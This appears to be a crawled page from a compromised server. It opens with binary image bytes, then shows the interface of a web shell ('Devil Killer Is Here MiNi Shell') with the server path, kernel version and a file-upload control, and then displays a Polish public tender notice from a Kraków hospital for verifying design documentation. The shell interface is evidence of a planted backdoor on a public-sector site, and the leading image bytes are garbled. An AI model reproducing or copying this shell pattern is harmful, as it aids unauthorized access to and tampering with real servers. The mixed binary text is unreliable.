JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251030/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251030/0050544601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa polegająca na dokonaniu weryfikacji oraz poprawy dokumentacji projektowej, opracowaniu przedmiarów, kosztorysów inwestorskich i pełnieniu czynności nadzoru autorskiego nad robotami budowlanymi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Kliniczny im. dr. J. Babińskiego SPZOZ w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000298554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">dr. Józefa Babińskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-393</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@babinski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.babinski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa polegająca na dokonaniu weryfikacji oraz poprawy dokumentacji projektowej, opracowaniu przedmiarów, kosztorysów inwestorskich i pełnieniu czynności nadzoru autorskiego nad robotami budowlanymi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38e451ee-5341-4d3b-8498-52bdc381cbe0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00505446</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00001460/21/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Usługa polegająca na dokonaniu weryfikacji oraz poprawy dokumentacji projektowej, opracowaniu przedmiarów robót i kosztorysów inwestorskich oraz pełnieniu czynności nadzoru autorskiego nad robotami</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Modernizacja budynków szpitalnych na potrzeby leczenia psychiatrycznego dzieci i młodzieży w Małopolsce”, EFRR - Fundusze Europejskie dla Małopolski 2021-2027, Działanie - Środowiskowa opieka psychiatryczna dla dzieci, młodzieży i dorosłych, Typ projektu A - Wsparcie opieki psychiatrycznej dla dzieci, młodzieży i dorosłych </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szpital_babinski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital_babinski <br/>2. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. <br/>3. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej w zakładce „Regulamin&#34; oraz uznaje go za wiążący, b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na stronie internetowej. <br/>4. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje <br/>5. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z 09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg). b) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z<br/>6. Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do Zamawiającego”, nie za pośrednictwem adresu email. <br/>7. Wykonawca ofertę oraz przedmiotowe środki dowodowe (jeżeli są wymagane w SWZ) składa pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital_babinski na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-33/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania jest udzielenie zamówienia w zakresie wykonania usługi polegającej na:<br/>1) Dokonaniu weryfikacji oraz poprawy dokumentacji projektowej dla zadania inwestycyjnego pn. „PRZEBUDOWA, ROZBUDOWA, NADBUDOWA BUDYNKU SZPITALNEGO NR 3B celem dostosowania pomieszczeń budynku do potrzeb Małopolskiego Centrum Leczenia Uzależnień Dzieci i Młodzieży wraz ze zmianą sposobu użytkowania pomieszczeń nieużytkowanych poddasza i piwnicy na użytkowe oraz budową wentylacji mechanicznej i klimatyzacji, budową instalacji wod.-kan., c.o. i elektrycznej, budową nowego szybu windowego i klatki schodowej wraz z pracami konserwatorskimi elewacji i przebudową dachu oraz budową parkingu z fragmentem drogi, budową schodów zewnętrznych i terenów utwardzonych wokół budynku wraz z zagospodarowaniem terenu pomiędzy budynkami 4B i 3B, obejmującego budowę: ścieżek i placów utwardzonych, altany, placu zabaw, boiska do siatkówki, stołów betonowych do tenisa stołowego oraz lamp oświetleniowych na działce nr 1/31 obr. 70 Podgórze ul. dr J. Babińskiego 29 w Krakowie”, autorstwa MAKI Architekci Sp. z o.o. z siedzibą w Krakowie (zwanej dalej też „Dokumentacją projektową”).<br/>2) Opracowaniu nowych przedmiarów robót i kosztorysów inwestorskich dla zadania inwestycyjnego wskazanego w pkt 1) niniejszego ustępu.<br/>3) Pełnieniu czynności nadzoru autorskiego nad robotami budowlanymi realizowanymi w ramach zadania inwestycyjnego, o którym mowa w pkt 1) niniejszego ustępu - na warunkach określonych w wzorze umowy (załączniku nr 4 do SWZ).<br/>2.	W ramach przedmiotu zamówienia o którym mowa w Sekcji III ust. 1 pkt 1) Specyfikacji Warunków Zamówienia, Wykonawca:<br/>1) Dokona weryfikacji Dokumentacji projektowej w zakresie projektu budowlanego oraz wszystkich opracowań projektowych składających się na projekt budowlany (inwentaryzacja; projekt architektoniczno-budowlany; projekt zagospodarowania terenu; wentylacja mechaniczna), w tym również Programu prac konserwatorskich, oraz dokona stosownych poprawek tej dokumentacji celem zapewnienia jej zgodności z wymaganiami art. 99 - art. 103 Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, poprzez opracowanie dokumentów zawierających parametry i kryteria równoważności przyjętych rozwiązań projektowych i materiałów.<br/>2) Dokona weryfikacji i poprawy Dokumentacji projektowej w zakresie:<br/>a) projektów technicznych (konstrukcja; instalacje centralnego ogrzewania; wentylacja mechaniczna i klimatyzacja; instalacje wodno-kanalizacyjne; instalacje elektryczne; projekt drogowy), <br/>b) projektów wykonawczych (architektura; architektura – uzupełnienie zaleceń MKZ; konstrukcja; wentylacja mechaniczna i klimatyzacja oraz specyfikacja techniczna; centralne ogrzewanie, ciepło wentylacyjne, węzeł cieplny wymiennikowy; instalacje wod.-kan., ciepła woda użytkowa oraz specyfikacja techniczna; instalacje elektryczne; instalacje elektryczne i słaboprądowe - specyfikacja techniczna wykonania i odbioru robót; projekt wykonawczy – zamienny - instalacje elektryczne – oświetlenie ogólne; projekt drogowy), <br/>c) Specyfikacji technicznej wykonania i odbioru robót budowlanych,<br/>d) informacji dotyczącej bezpieczeństwa i ochrony zdrowia (plan BIOZ).<br/>Przez wskazaną w niniejszym punkcie weryfikację i poprawę Dokumentacji projektowej Zamawiający rozumie: <br/>a) sprawdzenie przyjętych w Dokumentacji projektowej rozwiązań projektowych w zakresie ich poprawności i zgodności z wymaganiami wynikającymi ze wskazanych w ust. 5 Specyfikacji Warunków Zamówienia wydanych na rzecz Zamawiającego decyzji, postanowień i innych wiążących Zamawiającego dokumentów określających warunki realizacji zadania inwestycyjnego wskazanego w Sekcji III ust. 1 pkt 1) Specyfikacji Warunków Zamówienia. <br/>b) sprawdzenie przyjętych w Dokumentacji projektowej rozwiązań projektowych w zakresie celu realizacji zadania inwestycyjnego (Sekcja III ust. 1 pkt 1) Specyfikacji Warunków Zamówienia tj. zaleceń i wytycznych Zamawiającego, który planuje zrealizować na podstawie Dokumentacji projektowej zakres robót budowlanych, o którym mowa w dokumencie pn. „Planowany przez Zamawiającego przedmiot umowy na roboty budowlane”, który stanowi załącznik do niniejszej SWZ;<br/>c) dokonanie stosownych poprawek Dokumentacji projektowej w zakresie zmian nieistotnych poprzez opracowanie rysunków (rzutów, przekrojów), opisów, obliczeń, zestawień, itp., które okażą się być potrzebne do prawidłowej realizacji zadania inwestycyjnego wskazanego Sekcji III ust. 1 pkt. 1) Specyfikacji Warunków Zamówienia;<br/>d) opracowanie brakujących elementów Dokumentacji projektowej, które są niezbędne dla prawidłowej realizacji zadania inwestycyjnego wskazanego Sekcji III ust. 1 pkt 1) Specyfikacji Warunków Zamówienia, w tym opracowanie dokumentacji dotyczącej zapewnienia dostępności osobom ze szczególnymi potrzebami (np. dostępności architektonicznej, informacyjno-komunikacyjnej i cyfrowej) w oparciu o Ustawę z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami. Wskazana w zdaniu poprzednim opracowana przez Wykonawcę dokumentacja będzie zgodna z wymogami art. 99 - art. 103 Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>e) opracowanie dokumentów zawierających parametry i kryteria równoważności przyjętych rozwiązań projektowych i materiałów, zgodnie z wymogami art. 99 - art. 103 Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>f) wykonanie wszelkich innych czynności projektowych, które okażą się konieczne celem realizacji robót budowlanych zadania inwestycyjnego, o którym mowa w Sekcji III ust. 1 pkt 1) Specyfikacji Warunków Zamówienia, w sposób prawidłowy oraz zgodny z wymaganiami wynikającymi z wydanych na rzecz Zamawiającego decyzji, postanowień i innych wiążących Zamawiającego dokumentów wskazanych w Sekcji III ust. 5 Specyfikacji Warunków Zamówienia.<br/>3.	W ramach przedmiotu zamówienia, o którym mowa w Sekcji III ust. 1 pkt 2) Specyfikacji Warunków Zamówienia, Wykonawca opracuje nowe przedmiary robót i kosztorysy inwestorskie - oddzielnie dla każdej branży, w podziale na poszczególne grupy robót, z zestawieniem robocizny, materiałów i sprzętu oraz tabelą elementów scalonych. <br/>Przedmiary robót i kosztorysy inwestorskie sporządzone zostaną w formie szczegółowej z określeniem: kosztu ogółem netto i brutto, stawek R-g, Kp i Zysk, ilości robót i wyceny poszczególnych elementów zamówienia z wyszczególnieniem składników cenotwórczych (R, M, S) oraz posiadać będą zestawienie robocizny, materiałów, sprzętu i tabelę elementów scalonych. <br/>Przedmiary robót i kosztorysy inwestorskie opracowane zostaną zgodnie z wymogami art. 99 - art. 103 Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/>4.	W ramach przedmiotu zamówienia Wykonawca ponadto:<br/>1) Przeniesie na Zamawiającego całość autorskich praw majątkowych do opracowanej Dokumentacji po korekcie, na warunkach określonych we wzorze umowy (załączniku nr 4 do SWZ).<br/>2) Udzieli Zamawiającemu gwarancji jakości na Dokumentację po korekcie, zgodnie z zapisami wzoru umowy (załącznika nr 4 do SWZ).<br/>5.	Dla Dokumentacji projektowej Zamawiający posiada wszelkie wymagane prawem uzgodnienia, opinie, pozwolenia i decyzje niezbędne do realizacji robót budowlanych dla zadania inwestycyjnego wskazanego w Sekcji III ust. 1 pkt 1) Specyfikacji Warunków Zamówienia, w tym między innymi:<br/>1) Decyzję o pozwoleniu na budowę nr 251/6740.2/2023 wydaną przez Prezydenta Miasta Krakowa z dnia 11.05.2023 r.;<br/>2) Pozwolenie Miejskiego Konserwatora Zabytków nr 40/23 z dnia 23.01.2023 r. wraz ze zmianą w postaci decyzji Miejskiego Konserwatora Zabytków nr 34/23 z dnia 31.01.2023 r.;<br/>3) Pozwolenie Miejskiego Konserwatora Zabytków nr 46/23 z dnia 24.01.2023 r. dotyczące usunięcia drzew wraz ze zmianą w postaci decyzji Miejskiego Konserwatora Zabytków nr 37/23 z dnia 31.01.2023 r. <br/>6.	Wykonawca zobowiązany jest dokonać weryfikacji i poprawy Dokumentacji projektowej w takim zakresie i w taki sposób, aby Zamawiający mógł wykonać roboty budowlane dla zadania inwestycyjnego wskazanego Sekcji III ust. 1 pkt 1) Specyfikacji Warunków Zamówienia, na podstawie posiadanych decyzji o pozwoleniu na budowę oraz pozostałych wymaganych przepisami prawa pozwoleń, uzgodnień i opinii, o których mowa w Sekcji III ust. 5 Specyfikacji Warunków Zamówienia. Tym samym wszelkie poprawki lub zmiany wprowadzone przez Wykonawcę do Dokumentacji projektowej nie mogą skutkować powstaniem po stronie Zamawiającego obowiązku zmiany pozwolenia na budowę ani zmiany lub ponownego uzgodnienia wskazanych w zdaniu poprzednim opinii, uzgodnień, pozwoleń i innych dokumentów niezbędnych do realizacji robót budowlanych dla zadania inwestycyjnego wskazanego Sekcji III ust. 1 pkt 1) Specyfikacji Warunków Zamówienia. <br/>7.	Wykonawca zobowiązany jest zrealizować przedmiot zamówienia w sposób fachowy, z zachowaniem najwyższej dbałości i staranności, której można oczekiwać od profesjonalisty posiadającego doświadczenie w świadczeniu usług porównywalnych rozmiarem, zakresem oraz złożonością do przedmiotu niniejszego zamówienia. <br/>8.	Dokumentacja po korekcie zgodna będzie z wymaganiami Ustawy z dnia 7 lipca 1994 r. Prawo budowlane, Ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, Rozporządzenia Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego, Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, jak również wymogami innych obowiązujących przepisów oraz zasad wiedzy technicznej. <br/>9.	Przedmiot zamówienia zrealizowany zostanie zgodnie ze wzorem umowy, który stanowi załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa:<br/>1. Warunek zostanie spełniony jeżeli Wykonawca wykaże, że wykonał, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, jedną usługę o wartości nie mniejszej niż 50 tys. zł. polegającą na opracowaniu dokumentacji projektowej, na podstawie której uzyskano decyzję zatwierdzającą projekt budowlany lub projekt architektoniczno-budowlany, i udzielającą pozwolenia na budowę dla inwestycji dotyczącej budowy lub rozbudowy lub przebudowy lub modernizacji lub remontu obiektu kubaturowego, wraz z opracowaniem przedmiarów i kosztorysów inwestorskich oraz pełnieniem nadzoru autorskiego nad realizacją robót budowlanych wykonywanych na podstawie tej dokumentacji projektowej Wykonawcy, wraz z załączeniem dowodów określających czy ta usługa została wykonana lub jest wykonywana należycie.<br/><br/>Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie oświadczenia Wykonawcy pn. „Wykaz usług”, którego wzór stanowi załącznik nr 2.2 do SWZ i załączonych dowodów.<br/><br/>2. Warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje odpowiednimi osobami zdolnymi do wykonania zamówienia, to jest co najmniej jedną osobą projektanta skierowanego przez Wykonawcę do realizacji zamówienia, który legitymuje się posiadaniem uprawnień do projektowania bez ograniczeń w specjalności architektonicznej lub w specjalności konstrukcyjno-budowlanej (w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie).<br/><br/>Stosownie do art. 12. ust. 7 ustawy z dnia 07.07.1994 r. Prawo budowlane – „Podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi wpis na listę członków właściwej izby samorządu zawodowego potwierdzony zaświadczeniem wydanym przez tę izbę z określonym w nim terminem ważności”.<br/><br/>Zgodnie z art. 12a. ustawy z dnia 07.07.1994 r. Prawo budowlane – „Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych”. Regulację odrębną stanowią przepisy ustawy z 